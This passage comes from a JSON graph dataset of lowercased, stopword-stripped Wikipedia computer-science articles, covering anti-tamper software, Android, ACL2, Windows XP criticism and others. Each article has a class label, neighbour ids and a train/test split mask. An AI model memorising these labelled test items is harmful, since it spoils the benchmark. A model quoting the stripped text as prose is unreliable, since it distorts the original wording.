starforce securom anti-tamper software uses white-box cryptography cryptographic keys revealed even cryptographic computations observed complete detail debugger recent research trend tamper-tolerant software aims correct effects tampering allow program continue unmodified simple easily defeated scheme kind used diablo ii video game stored critical player data two copies different memory locations one modified externally game used lower value anti-tamper software used many types software products including embedded systems financial applications software mobile devices network-appliance systems anti-cheating games military license management software digital rights management drm systems general-purpose packages developed wrap existing code minimal programing effort example securom similar kits used gaming industry though downside semi-generic attacking tools also exist counter malicious software observed using anti-tampering techniques example mariposa botnet",
    "neighbors": [
      2213,
      107,
      3724,
      8171,
      9677,
      9488,
      5586,
      11188,
      5404,
      10173,
      2558
    ],
    "mask": "Train"
  },
  {
    "node_id": 11082,
    "label": 2,
    "text": "List_of_features_in_Android:list features android list features android operating system android devices include still/video cameras touchscreens gps accelerometers gyroscopes barometers magnetometers dedicated gaming controls proximity pressure sensors thermometers accelerated 2d bit blits hardware orientation scaling pixel format conversion accelerated 3d graphics",
    "neighbors": [
      6657,
      5637,
      8719,
      3600,
      2579,
      7700,
      9244,
      11294,
      1578,
      9770,
      5677,
      559,
      4661,
      3639,
      1083,
      9275,
      10303,
      64,
      6212,
      69,
      8262,
      9286,
      5707,
      4685,
      3664,
      10834,
      6231,
      8280,
      8794,
      6747,
      8285,
      2658,
      1642,
      9834,
      115,
      9843,
      4728,
      5755,
      11391,
      1664,
      1670,
      5262,
      2193,
      2199,
      10393,
      7835,
      10910,
      8351,
      8864,
      673,
      4259,
      8870,
      1191,
      7340,
      9908,
      11449,
      4797,
      196,
      11466,
      8907,
      7885,
      4310,
      8921,
      8923,
      8413,
      9949,
      737,
      4326,
      1255,
      8940,
      246,
      3834,
      8443,
      5892,
      7428,
      7943,
      5384,
      2828,
      280,
      10009,
      4890,
      7965,
      798,
      10525,
      288,
      2852,
      8486,
      10537,
      1834,
      7983,
      3380,
      5431,
      2875,
      3900,
      10045,
      10057,
      332,
      3409,
      8019,
      2901,
      5467,
      3940,
      8557,
      1400,
      7548,
      6528,
      3971,
      4995,
      3462,
      8584,
      9610,
      10129,
      5522,
      1427,
      7572,
      10645,
      2978,
      5026,
      1959,
      424,
      937,
      5546,
      6057,
      7595,
      4048,
      2001,
      5078,
      479,
      5605,
      487,
      8169,
      1516,
      5100,
      494,
      5613,
      1520,
      7152,
      5620,
      11252,
      5114,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 11083,
    "label": 9,
    "text": "ACL2:acl2 acl2 computational logic applicative common lisp software system consisting programming language extensible theory first-order logic automated theorem prover acl2 designed support automated reasoning inductive logical theories mostly purpose software hardware verification input language implementation acl2 written common lisp acl2 free open-source software acl2 programming language applicative side-effect free variant common lisp acl2 untyped acl2 functions total — every function maps object acl2 universe another object universe acl2 base theory axiomatizes semantics programming language built-in functions user definitions programming language satisfy definitional principle extend theory way maintains theory logical consistency core acl2 theorem prover based term rewriting core extensible user-discovered theorems used ad-hoc proof techniques subsequent conjectures acl2 intended industrial strength version boyer–moore theorem prover nqthm toward goal acl2 many features support clean engineering interesting mathematical computational theories acl2 also derives efficiency built common lisp example specification basis inductive verification compiled run natively 2005 authors boyer-moore family provers includes acl2 received acm software system award pioneering engineering effective theorem prover ... formal methods tool verifying safety-critical hardware software acl2 numerous industrial applications 1995 j strother moore matt kaufmann tom lynch used acl2 prove correctness floating point division operation amd k5 microprocessor wake pentium fdiv bug interesting applications page acl2 documentation summary uses system industrial users acl2 include amd centaur technology ibm intel oracle rockwell collins",
    "neighbors": [
      4865,
      8834,
      9345,
      2438,
      9865,
      2062,
      9492,
      9877,
      4122,
      1952,
      1448,
      4779,
      7983,
      8883,
      4791,
      6201,
      6969,
      7867,
      8258,
      8771,
      4550,
      8262,
      5064,
      10571,
      8908,
      1613,
      9299,
      1365,
      2392,
      473,
      7896,
      9816,
      6493,
      11488,
      7267,
      6502,
      3176,
      9320,
      2667,
      1388,
      5612,
      4606
    ],
    "mask": "Test"
  },
  {
    "node_id": 11084,
    "label": 2,
    "text": "P.I.P.S.:p.i.p.s p.i.p.s term recursive acronym symbian software libraries means p.i.p.s posix symbian os intended help c language programmers migration desktop server middleware applications symbian os based mobile smartphone devices pips software libraries provides c c++ application programming interfaces standard c libraries p.i.p.s environment support true signalling basic signal support emulated using threads open c open c++ extensions nokia p.i.p.s contrast mere p.i.p.s. series 60 phones name result internal competition symbian developer marketing department organised bruce carney developer marketing erik jacobson product manager full-stops inserted symbian legal department ensure trademark copyright infringements",
    "neighbors": [
      7877,
      7983,
      2804,
      8122,
      1083,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 11085,
    "label": 9,
    "text": "Forte_4GL:forte 4gl forté 4gl proprietary application server developed forté software used developing scalable highly available enterprise applications forté 4gl created integrated solution developing managing client/server applications forté 4gl consists application server tools deploying monitoring application object oriented proprietary programming language tool transactional object oriented language given tool runs forté application server many users simply refer tool applications forté applications first release forté 4gl published august 1994 releasing initial product forté inc. proceeded build several extensions including 1999 forté software came version forte based java instead tool named synerj also referred forté java original tool-based products consisted development ide code repository runtime environment new java product interest sun microsystems bought company tool-based extensions listed bundled together re-branded unified development server uds integration server iplanet division server modules later bundled together enterprise application integration eai sun declared product end-of-life indicating future plans continue development product sun official support forte ended april 2009 enterprise application development system forté 4gl supported close linkage number different relational database systems including oracle sybase microsoft sql server informix db2 linkages could via sql embedded within tool code via sql constructed fly also support distributed applications developer would create instance specific class would placed user-specified server calls methods instance would sent across network transparently developer would need know underlying details call would transmitted tool object-oriented language following features among others tool code case-insensitive statement always terminated semicolon compound statements enclosed keywords codice_2 codice_3 comments indicated // -- remainder line becomes comment /* ... */ data types simple data types corresponding object data types examples arrays indicated keywords codice_4 first element array indexed 1 variable declaration conditional statements if-statement case-statement iteration loops events event posted e.g following statement statement posts event named codice_5 event one argument named id events handled event handlers example exception handling multithreading new thread launched statement like codice_6",
    "neighbors": [
      9665,
      6850,
      9286,
      4042,
      5677,
      9268,
      11030
    ],
    "mask": "None"
  },
  {
    "node_id": 11086,
    "label": 2,
    "text": "OpenOSPFD:openospfd openospfd isc licensed implementation open shortest path first protocol network routing software suite allows ordinary general purpose computers used routers exchanging routes computer systems speaking ospf protocol openospfd developed esben nørby claudio jeker openbsd project companion daemon openbgpd software developed alternative packages quagga routing software suite licensed gpl openospfd developed openbsd ports exist freebsd netbsd design goals openospf include secure non-exploitable reliable lean easy use configuration language intended powerful easy enough users",
    "neighbors": [
      4611,
      9223,
      10631,
      2825,
      3465,
      1932,
      3473,
      274,
      1814,
      7702,
      10105,
      1436,
      3751,
      7082,
      3885,
      686,
      6702,
      7983,
      9520,
      3007,
      9279,
      10303,
      10433,
      2245,
      5959,
      9927,
      1993,
      5322,
      8778,
      3404,
      7887,
      5970,
      10451,
      9048,
      1754,
      5978,
      5084,
      7139,
      1637,
      4071,
      5230,
      1785,
      8954,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 11087,
    "label": 9,
    "text": "Narcissus_(JavaScript_engine):narcissus javascript engine narcissus open source javascript engine written brendan eich also wrote first javascript engine spidermonkey name based mythical figure narcissus fell love relates fact javascript engine metacircular interpreter engine also written javascript albeit using non-standard extensions specific spidermonkey narcissus engine plugged firefox via zaphod add-on run scripts web pages since narcissus simpler code-base real javascript engines used prototype new language features less effort",
    "neighbors": [
      1409,
      259,
      3462,
      6791,
      10507,
      8854,
      4378,
      8605,
      7455,
      8479,
      803,
      3761,
      11060,
      438,
      5311,
      2880,
      7871,
      9152,
      4171,
      339,
      84,
      4822,
      4056,
      9560,
      603,
      482,
      5219,
      7396,
      487,
      5483,
      9195,
      10991,
      10097,
      119,
      6143
    ],
    "mask": "None"
  },
  {
    "node_id": 11088,
    "label": 4,
    "text": "Gpg4win:gpg4win gpg4win email file encryption package versions microsoft windows uses gnupg public-key cryptography data encryption digital signatures original creation gpg4win supported germany federal office information security however gpg4win included tools free open source software typically non-proprietary option privacy recommended windows users",
    "neighbors": [
      8640,
      9281,
      2050,
      7139,
      8674,
      10631,
      10600,
      4746,
      8331,
      6797,
      7983,
      5749,
      8283
    ],
    "mask": "Test"
  },
  {
    "node_id": 11089,
    "label": 4,
    "text": "Communications_&_Information_Services_Corps:communications amp information services corps communications information services corps cis – formerly army corps signals – one combat support corps irish defence forces military ireland responsible installation maintenance operation communications information systems command control administration defence forces facilitation accurate real-time sharing intelligence army naval service air corps branches home overseas cis corps headquartered mckee barracks dublin comes command officer colonel rank known director cis corps formerly army corps signals communications information services corps responsible development operation information technology telecommunications systems support defence forces tasks also responsible coordinating communications – radio line – information systems communications research updating communications line modern developments operational requirements cis corps tasked utilising networking information technologies order dramatically increase defence force operational effectiveness provision timely accurate information appropriate commander along real time efficient sharing information intelligence army naval service air corps well multinational partners involved international peacekeeping actors required role includes development maintenance secure nationwide defence forces telecommunications network dftn support protected voice data services provision maintenance encrypted military communications equipment use defence forces personnel home abroad cis corps units dispersed throughout df giving communications support army brigades naval service air corps defence forces training centre dftc defence forces headquarters dfhq cis corps base workshops detailed maintenance research development conducted cis corps collar flash features angel gabriel messenger god behind signal shield caption cór comharthaíochta irish translation 'signals corps translation communications information services corps cór seirbhísí cumarsáide agus eolais communications information services cis corps works defence forces intelligence branch directorate military intelligence j2 regards signals intelligence sigint houses dedicated sigint element within corps df cis corps ability intercept monitor communications remotely collect data process irish legislation criminal justice surveillance act 2009 interception postal packets telecommunications messages regulation act 1993 provides defence forces legal authority conduct domestic intelligence operations involving espionage electronic communications stored electronic information order safeguard maintain security state cis corps along garda síochána national police force provide significant domestic support role national cyber security centre ncsc department communications climate action environment countering cyber-attacks protecting critical national infrastructure securing government communications cis responsible cyber security within defence forces maintains capability area purpose protecting networks users domestic foreign 2016 establishment computer incident response team cirt dfhq cis company revealed july 2015 leaked email correspondence hacking team – private italian spying eavesdropping software company – reportedly showed members irish cis corps discussions company purchase intrusion surveillance solutions lawful interception online communications monitoring incoming outgoing emails browsing activity skype calls remotely switching webcams microphones remotely taking control devices defence forces spokesperson said operational security reasons could comment specific elements activities cis corps confirmed goods services purchased company question soldiers join communications information services corps one following apprenticeship trades personnel basic military training cis school runs large number cis related courses including degree programme military communications cis technicians association institute technology carlow 3 sections cis school providing training areas operational procedures technical proficiency simulation procedural operations section proc/ops technical section simulation section dirt range digital indoor shooting range trainees assessed marksmanship skills various small arms weapons used df helps develop proficiencies methodically without firing live ammunition regular basis €1 million facility based department defence properties kilworth camp county cork reserve defence forces rdf units integrated permanent defence forces pdf units part single force concept",
    "neighbors": [
      5024,
      4937,
      3629,
      10766,
      7887,
      1169,
      4595,
      8564,
      7893
    ],
    "mask": "Test"
  },
  {
    "node_id": 11090,
    "label": 9,
    "text": "Hop_(software):hop software hop lisp-like programming language manuel serrano web 2.0 also name web broker server proxy implements language written bigloo scheme project funded inria hop stratified language means single program file contains instructions server client server executes cpu demanding computations operations require system privileges accessing files resources clients may many browsers cell phones etc dedicated executing actions related programming graphical user interfaces code snippet illustrates concepts given recent introduction hop currently exhibits number weaknesses",
    "neighbors": [
      225,
      9345,
      10083,
      6502,
      8262,
      2225
    ],
    "mask": "None"
  },
  {
    "node_id": 11091,
    "label": 4,
    "text": "MinID:minid minid electronic login system used secure range internet services norwegian public sector communication done minid encrypted secure information unauthorized usage everyone registered norwegian population register age 13 years create public id minid april 2010 2 million people living norway created user accounts minid create public id pin-codes norwegian tax administration needed purpose minid communicate electronic identity users authorized use electronic services secure way minid user database social security numbers pin-codes saved minid used access 50 online services various norwegian public agencies including norwegian labour welfare administration directorate taxes state educational loan agency public management e-government difi controller personal data handled minid agency public management egovernment norwegian direktoratet forvaltning og informasjons- og kommunikasjonsteknologi difi government agency subordinate norwegian ministry government administration reform responsible help public sector achieve quality efficiency user friendliness openness participation well helping public sector organized led good way good intersectoral cooperation users minid user profile contains mobile phone number and/or e-mail address data used administrate minid use e-mail address needed order send user temporary password forgets password phone number needed order send sms-code log temporary password user forgets password according law users claim full access handling personal data users also right information data handled saved correct delete inaccurate data users time choose delete user minid user profile deleted minid user database minid passes user social security number chosen language public services logs user go public services without new login",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 11092,
    "label": 4,
    "text": "Sam_Spade_(software):sam spade software sam spade name windows software tool designed assist tracking sources e-mail spam also name free web service provides access similar online tools sam spade utility authored steve atkins 1997 named fictional character sam spade main features query tools last fully functional version website available 2004-02-26 since experienced various outage problems due blackholing samspade.org several rirs general heavy usage longer online url currently redirects https //tools.wordtothewise.com/ contains similar set web tools brand name wisetools hosted atkins email software business word wise",
    "neighbors": [
      11607
    ],
    "mask": "None"
  },
  {
    "node_id": 11093,
    "label": 7,
    "text": "Squirrel_Systems:squirrel systems squirrel systems burnaby-based point sale vendor specializing hospitality management systems squirrel based burnaby canada squirrel systems founded 1984 released first restaurant point sale system use integrated diskless touchscreen terminal order management originally wholly owned subsidiary sulcus hospitality technologies corporation 1998 sulcus merged eltrax systems incorporated nasdaq smallcap eltx squirrel currently wholly owned subsidiary marin investments ltd. one unique characteristics squirrel original product use hardened lcd touchscreen terminals unlike systems used keyboards crt monitors squirrel terminals moving parts easily adapted operating environment original squirrel terminals reached 35,000 installed units worldwide first integrate lcd panel credit card reader employee id reader cpu inside single unit later units would incorporate ip connectivity remote booting customized linux operating system java virtual machine 1998 squirrel systems released squirrel embedded linux sel customized distribution linux thin client terminal architecture sel several characteristics unique time development including primary support diskless workstations customized high-volume touchscreen drivers integrated java virtual machine hardware control two-stage booting windows server",
    "neighbors": [
      10926,
      1776,
      8976,
      5872,
      11030,
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 11094,
    "label": 7,
    "text": "Bluetooth_mesh_networking:bluetooth mesh networking bluetooth mesh networking conceived 2015 adopted protocol based upon bluetooth low energy allows many-to-many communication bluetooth radio defined mesh profile specification mesh model specification communication carried messages may 384 bytes long using segmentation reassembly sar mechanism messages fit one segment 11 bytes message starts opcode may single byte special messages 2 bytes standard messages 3 bytes vendor-specific messages every message source destination address determining devices process messages devices publish messages destinations single things groups things everything message sequence number protects network replay attacks message encrypted authenticated two keys used secure messages 1 network keys – allocated single mesh network 2 application keys – specific given application functionality e.g turning light vs reconfiguring light messages time live ttl time message received retransmitted ttl decremented limits number hops eliminating endless loops bluetooth mesh flood network based nodes relaying messages every relay node receives network packet authenticates known network key message cache ttl ≥ 2 retransmitted ttl ttl 1 message cache used prevent relaying messages recently seen bluetooth mesh layered architecture multiple layers yet determined practical limits bluetooth mesh technology limits built specification though version 1.0 bluetooth mesh specification following standard models model groups defined foundation models defined core specification two mandatory mesh nodes provisioning process installing device network mandatory step build bluetooth mesh network provisioning process provisioner securely distributes network key unique address space device provisioning protocol uses p256 elliptic curve diffie-hellman key exchange create temporary key encrypt network key information provides security passive eavesdropper also provides various authentication mechanisms protect network information active eavesdropper uses man-in-the-middle attack provisioning process key unique device known device key derived elliptic curve shared secret provisioner device provisioning process device key used provisioner encrypt messages specific device security provisioning process analyzed paper presented ieee cns 2018 conference provisioning performed using bluetooth gatt connection advertising using specific bearer",
    "neighbors": [
      10021,
      9863,
      9098,
      11405,
      11250,
      3511,
      5276,
      4863
    ],
    "mask": "None"
  },
  {
    "node_id": 11095,
    "label": 2,
    "text": "Uswsusp:uswsusp uswsusp abbreviated userspace software suspend stylized µswsusp set userspace command-line utilities linux act primarily wrappers around linux kernel hibernation functionality implement sleep mode utility referred suspend ram hibernation utility referred suspend disk hybrid sleep utility referred suspend supports linux kernel versions 2.6.17 newer uswsusp supports image checksumming data compression disk encryption integration splashy fbsplash",
    "neighbors": [
      3082,
      5139,
      10780,
      10785,
      3618,
      6180,
      3109,
      8242,
      9266,
      4161,
      10817,
      6213,
      8268,
      5222,
      10856,
      4207,
      7794,
      4734,
      7812,
      8326,
      4238,
      10382,
      2195,
      2711,
      9882,
      1694,
      2723,
      10933,
      5815,
      5822,
      1736,
      2762,
      8909,
      7375,
      8410,
      10971,
      8928,
      1761,
      2278,
      233,
      4841,
      10482,
      2294,
      8439,
      2809,
      7938,
      4360,
      1813,
      792,
      10016,
      295,
      7983,
      823,
      6968,
      7992,
      318,
      3911,
      6988,
      10063,
      5975,
      7519,
      10091,
      7540,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      11155,
      9621,
      8602,
      11678,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      9646,
      9660,
      457,
      5067,
      8147,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      8186,
      2044,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 11096,
    "label": 3,
    "text": "Goody_(video_game):goody video game goody platform game developed gonzalo gonzo suárez released 1987 spanish company opera soft game released amstrad cpc ms-dos msx zx spectrum platforms experienced thief john nelson brainner stravinsky known goody mission break bank spain equipped ladder goody explores catacombs city buildings along way may collect treasure needed purchase tools dynamite drill find access code main vault many objects enemies remote-control combat helicopters vipers gorillas policeman rodríguez ghosts evil moon try stop goody remake game linux windows titled goody remake released coptron game studios 2007 version brings brand new graphics music theme sound effects keeps gameplay atmosphere authentic goody version mobile phones created exelweiss published ebrain mobile 2007 called goody returns version uses 2.5d graphics video game called speakerman released 2019 art style game world heavily inspired goody",
    "neighbors": [
      10931,
      9166,
      9006,
      823
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11097,
    "label": 4,
    "text": "Virtual_private_server:virtual private server virtual private server vps virtual machine sold service internet hosting service virtual dedicated server vds also similar meaning vps runs copy operating system os customers may superuser-level access operating system instance install almost software runs os many purposes functionally equivalent dedicated physical server software-defined able much easily created configured priced much lower equivalent physical server however share underlying physical hardware vpses performance may lower depending workload executing virtual machines force driving server virtualization similar led development time-sharing multiprogramming past although resources still shared time-sharing model virtualization provides higher level security dependent type virtualization used individual virtual servers mostly isolated may run full-fledged operating system independently rebooted virtual instance partitioning single server appear multiple servers increasingly common microcomputers since launch vmware esx server 2001 physical server typically runs hypervisor tasked creating releasing managing resources guest operating systems virtual machines guest operating systems allocated share resources physical server typically manner guest aware physical resources save allocated hypervisor vps runs copy operating system customers superuser-level access operating system instance install almost software runs os however due number virtualization clients typically running single machine vps generally limited processor time ram disk space ultimately used decrease hardware costs condensing failover cluster single machine thus decreasing costs dramatically providing services server roles features generally designed operate isolation example windows server 2019 requires certificate authority domain controller exist independent servers independent instances windows server additional roles features adds areas potential failure well adding visible security risks placing certificate authority domain controller poses potential root access root certificate directly motivates demand virtual private servers order retain conflicting server roles features single hosting machine also advent virtual machine encrypted networks decreases pass-through risks might otherwise discouraged vps usage legitimate hosting server many companies offer virtual private server hosting virtual dedicated server hosting extension web hosting services several challenges consider licensing proprietary software multi-tenant virtual environments unmanaged self-managed hosting customer left administer server instance unmetered hosting generally offered limit amount data-transferred fixed bandwidth line usually unmetered hosting offered 10 mbit/s 100 mbit/s 1000 mbit/s high 10gbit/s means customer theoretically able use ~3 tb 10 mbit/s ~300 tb 1000 mbit/s line per month although practice values significantly less virtual private server shared bandwidth fair usage policy involved unlimited hosting also commonly marketed generally limited acceptable usage policies terms service offers unlimited disk space bandwidth always false due cost carrier capacities technological boundaries",
    "neighbors": [
      9088,
      5378,
      6018,
      4238,
      10522,
      6435,
      6565,
      6438,
      7078,
      9766,
      7983,
      1840,
      9655,
      10747,
      700,
      318,
      11073,
      5314,
      11075,
      4958,
      354,
      4194,
      7660,
      9202,
      5749,
      5371,
      4734
    ],
    "mask": "Test"
  },
  {
    "node_id": 11098,
    "label": 1,
    "text": "Comparison_of_triplestores:comparison triplestores comparison triplestores also known subject-predicate-object databases database management systems built database engines scratch others built top existing commercial relational database engines e.g. sql-based like early development online analytical processing olap databases intermediate approach allowed large powerful database engines constructed little programming effort initial phases triplestore development long-term though seems native triplestores advantage performance difficulty implementing triplestores sql although triples may thus stored implementing efficient querying graph-based rdf model e.g. mapping sparql onto sql queries difficult following table overview available triplestores technical implementation support sparql world wide web consortium w3c recommendations available application programming interfaces api",
    "neighbors": [
      2688,
      5632,
      8451,
      3462,
      8582,
      8201,
      2062,
      9631,
      1697,
      5031,
      4777,
      5677,
      10413,
      9397,
      5047,
      6074,
      9147,
      7868,
      11324,
      11457,
      8644,
      6085,
      6470,
      2512,
      2901,
      7767,
      7650,
      3171,
      8291,
      6629,
      6502,
      9828,
      9320,
      10340,
      8554,
      10471,
      3573,
      1146,
      6395,
      124,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11099,
    "label": 9,
    "text": "Roger_Moore_(computer_scientist):roger moore computer scientist roger d. moore november 16 1939 – march 21 2019 1973 recipient larry breed richard lathwell grace murray hopper award association computing machinery acm given work design implementation apl\\ 360 setting new standards simplicity efficiency reliability response time interactive systems moore cofounder i. p. sharp associates held senior position company many years contributed subalgol compiler stanford university wrote algol 60 compiler ferranti-packard 6000 ict 1900 along work programming language apl also instrumental development ipsanet private packet switching data network roger d. moore born redlands california graduation worked operator burroughs 220 computer stanford time provided support larry breed ’ card stunt system also spent time studying burroughs 220 balgol compiler resulted butterfly described george forsythe grader program written balgol-language procedure compiled together procedure called butterfly written moore result relocatable machine-language procedure mechanism equating variables variables balgol program form balgol compiler ’ machine-language library procedures sin write read etc forsythe anticipated problem described bob braden balgol stanford outlived b220 hardware 1962 stanford contracted ibm obtain ibm 7090 campus computing created great consternation forsythe ’ office significant body faculty students familiar balgol high compiling speed bac vital academic environment subject community production-oriented system software offered ibm including slow fortran compiler cumbersome operating system would moved academic computing stanford backward several years address problem december 1961 moore hired forsythe work subalgol compiler ibm 7090 braden breed hired soon afterward completion subalgol hired ferranti-packard write algol 60 compiler fp6000 compiler part software package included sale fp6000 international computers tabulators december 1964 employees ferranti-packard computer group laid along six former fp employees formed i. p. sharp associates vice-president incorporation retirement 1989 1966 larry breed richard lathwell began work apl\\360 interpreter lastly apl\\360 owes much superior time-sharing performance roger d. moore i.p sharp associates toronto principally responsible supervisor design described extent deserves team received grace murray hopper award association computing machinery acm given work design implementation apl\\360 setting new standards simplicity efficiency reliability response time interactive systems 1970 moore became project leader ipsa speculative dos/360 cobol compiler project although compiler satisfactory performance market accept ipsa offered apl time-sharing service starting 1969 1975 inflexibility communication error intolerance time-division multiplexing longer tolerable became chief architect ipsanet packet switching computer network 1976 system deployed north america london 1984 ipsa released sharp apl ibm pc package included 370 emulator written moore retiring ipsa early 1989 became interested opera chamber music along attending many performances supported concerts commissions advanced music education moore funded composing many works",
    "neighbors": [
      512,
      9993,
      10008,
      1178,
      667,
      8987,
      1952,
      1316,
      10668,
      4921,
      9019,
      1219,
      3267,
      11075,
      1610,
      1099,
      9804,
      1613,
      7630,
      1236,
      2519,
      1883,
      7775,
      3168,
      9825,
      11625,
      4331,
      2670,
      2798,
      8695,
      505,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 11100,
    "label": 3,
    "text": "Compaq_Portable_series:compaq portable series compaq first computers portable 'lunchbox 'luggable computers belong compaq portable series computers measured approximately 1×1 foot side approx 2½ ft wide products evolved laptops notebooks created offing new level portability caused market explode portables portable portable ii crt monitors others portable iii portable 386 flat single-color usually amber plasma displays portables came/could come internal hard disk drives .5 shock mount springs diskette drives usually 5 double- quadruple-density drives batteries and/or dual-isa expansion chassis one full-drive-height wide later products included mono color lcd screens battery powered",
    "neighbors": [
      11008,
      5384,
      3214,
      8212,
      1304,
      8229,
      5571,
      7243,
      3281,
      2258,
      1874,
      8786,
      1638,
      3943,
      6765,
      6129,
      11505,
      5368,
      5756
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11101,
    "label": 3,
    "text": "Helix_HeadRoom:helix headroom headroom dos context switching multitasking memory manager produced helix software company late 1980s early 1990s headroom managed multiple terminate stay resident programs first tsr manager allow sharing address space interrupts among tsrs dos headroom v1.0 released september 1988 april 1989 helix software released headroom v1.1 together headroom network extensions version added support network communications processes headroom network extensions intercepted buffered netbios tcp/ip communications requests allowing headroom manage network communications software mainframe terminal emulators e-mail programs background communications programs would continue programs swapped headroom would reactivate swapped-out programs activity occurred netbios tcp/ip sockets october 1989 helix software released headroom v2.0 included support microsoft windows lim ems v4.0 starting march 1990 version headroom bundled ast research rampage rampage plus sixpack memory expansion boards june 1990 helix software licensed technology headroom digital communications associates use irma boards irmalan software january 1991 helix released final version headroom v2.03 thereafter incorporated headroom features netroom lan memory manager decision caused market confusion",
    "neighbors": [
      6321,
      6797,
      4589,
      5598
    ],
    "mask": "Test"
  },
  {
    "node_id": 11102,
    "label": 9,
    "text": "Zonnon:zonnon zonnon programming language along oberon modula pascal language line jürg gutknecht author programming language zonnon general purpose programming language pascal modula-2 oberon family conceptual model based objects definitions implementations modules computing model concurrent based active objects interact via syntax controlled dialogs language developed eth zürich institute computer systems prof. jürg gutknecht zonnon introduces concept 'active objects used represent real world concurrent objects within computer programs zonnon language report written brian kirk director robinsons associates david lightfoot oxford brookes university working prof. jürg gutknecht eth zürich dr. eugene zueff евгений зуев moscow state university first book zonnon published n. i. lobachevsky state university nizhny novgorod a.k.a nizhni novgorod state university zonnon member pascal family languages two beneficial consequences general purpose language b immediately familiar pascal modula-2 oberon programmers pascal programs domain algorithms data structures successfully compiled zonnon compiler minor modifications however perspective “ programming-in-the-large ” zonnon much elaborate compared predecessors four different kinds program units zonnon objects modules definitions implementations first two instantiated runtime third compile time unit abstraction fourth unit composition brief characterization zonnon uses compositional inheritance model based aggregation typically object module composed number functional components presenting clients form abstract definition set definitions plus object ’ intrinsic interface set public elements object constitutes interface object clients zonnon allows adding behavior objects modules purpose notion active object imported active oberon language generalized towards unified model hierarchic activities activities encapsulated threads come two flavors local activities agent activities local activities express intrinsic object dynamics typical context block statements representing “ launch logic ” set mutually independent activities assumption end block acts barrier passed activities terminated agent activities control interoperability objects terms formal dialogs agent activity within “ callee ” object serves template formal dialog caller callee agent activities typically implement parser predefined syntax constitutes kind contract two communication partners formal dialogs generalization asynchronous method calls reflected form syntax borrowed ordinary method calls",
    "neighbors": [
      9345,
      8262,
      8524,
      8082,
      8219,
      6558
    ],
    "mask": "Test"
  },
  {
    "node_id": 11103,
    "label": 2,
    "text": "Criticism_of_Windows_XP:criticism windows xp criticism windows xp deals issues security performance presence product activation errors specific microsoft operating system windows xp windows xp criticized vulnerabilities due buffer overflows susceptibility malware viruses trojan horses worms nicholas petreley register notes windows xp first version windows reflect serious effort isolate users system users private files limited system privileges however users default receive administrator account provides unrestricted access underpinnings system administrator account compromised limit control asserted pc windows xp home edition also lacks ability administer security policies denies access local users groups utility microsoft executives stated release security patches often causes spread exploits flaws crackers figure problems patches fix launch attacks unpatched systems example august 2003 blaster worm exploited vulnerability present every unpatched installation windows xp capable compromising system even without user action may 2004 sasser worm spread using buffer overflow remote service present every installation patches prevent well-known worms already released microsoft increasingly widespread use service pack 2 greater use personal firewalls may also contribute making worms like less common many attacks windows xp systems come form trojan horse e-mail attachments contain worms user opens attachment unknowingly infect computer may e-mail worm people notable worms sort infected windows xp systems include mydoom netsky bagle discourage users running programs service pack 2 includes attachment execution service records origin files downloaded internet explorer received attachment outlook express user tries run program downloaded untrusted security zone windows xp service pack 2 prompt user warning spyware adware continuing problem windows xp versions windows spyware also concern microsoft regard service pack updates barry goff group product manager microsoft said spyware could cause computers freeze upon installation service pack 2 january 2005 microsoft released free beta version windows defender removes spyware adware computers windows xp offers useful security benefits windows update set install security patches automatically built-in firewall user n't install updates long time windows update icon displayed toolbar windows automatically install restart computer lead loss unsaved data user away computer updates installed service pack 2 enables firewall default also adds increased memory protection let operating system take advantage new execute technology built cpus amd64 allows windows xp prevent buffer overflow exploits april 8 2014 extended support windows xp ended means security vulnerabilities longer patched general advice given microsoft security specialists longer use windows xp light united states v. microsoft corp. case resulted microsoft convicted illegally abusing operating system monopoly overwhelm competition markets windows xp drawn fire integrating user applications windows media player windows messenger operating system well close ties windows live id microsoft account service 2001 procomp – group including several microsoft rivals including oracle sun netscape – claimed bundling distribution windows media player windows xp continuance microsoft anticompetitive behavior integration windows live id time microsoft passport windows xp example microsoft attempting gain monopoly web services claims rebutted association competitive technology act computing technology industry association comptia partially funded microsoft battle fought fronts side subject heated exchange oracle larry ellison microsoft bill gates microsoft responded freedom innovate web site pointing earlier versions windows microsoft integrated tools disk defragmenters graphical file managers tcp/ip stacks protest microsoft anti-competitive microsoft asserted tools moved special general usage therefore belonged operating system avoid possibility injunction might delayed release windows xp microsoft changed licensing terms allow pc manufacturers hide access internet explorer remove competitors dismissed trivial gesture later microsoft released utility part service pack 1 sp1 allows icons links bundled software internet explorer windows media player windows messenger confused similar-named windows live messenger formerly msn messenger removed components remain system microsoft maintains necessary key windows functionality html help system windows desktop removing completely may result unwanted consequences one critic shane brooks argued internet explorer could removed without adverse effects demonstrated product xplite dino nuhagic created nlite software remove many components xp prior installation product addition first release windows xp buy music online feature always used microsoft internet explorer rather web browser user may set his/her default pressure united states department justice microsoft released patch early 2004 corrected problem migrating windows 9x xp issue users dependent upon ms-dos although xp comes ability run dos programs virtual dos machine still trouble running many old dos programs largely windows nt system use dos base os windows nt architecture different windows 9x dos programs run natively xp notably programs rely direct access hardware run emulators dosbox virtual machines like vmware virtual pc virtualbox also applies programs require direct access certain common emulated hardware components like memory keyboard graphics cards serial ports dos emulators 32-bit versions windows xp run almost program designed previous microsoft operating system 64-bit versions xp major backward-compatibility issues old 16-bit windows programs require tool called ntvdm present 32-bit version os however true every version windows comes 32-bit 64-bit versions specific xp attempt reduce piracy microsoft introduced product activation windows xp activation required computer user activate microsoft either online phone within certain amount time order continue using operating system user computer system ever changes — example two relevant components computer upgraded — windows return unactivated state need activated within defined grace period user tried reactivate frequently system refuse activate online user must contact microsoft telephone obtain new activation code however activation applied retail system builder intended use small local pc builders copies windows royalty oem used large pc vendors copies instead locked special signature machine bios demand activation moved system whose motherboard signature volume license copies require activation led pirates simply using volume license copies volume license keys widely distributed internet addition activation windows xp service packs refuse install windows xp systems 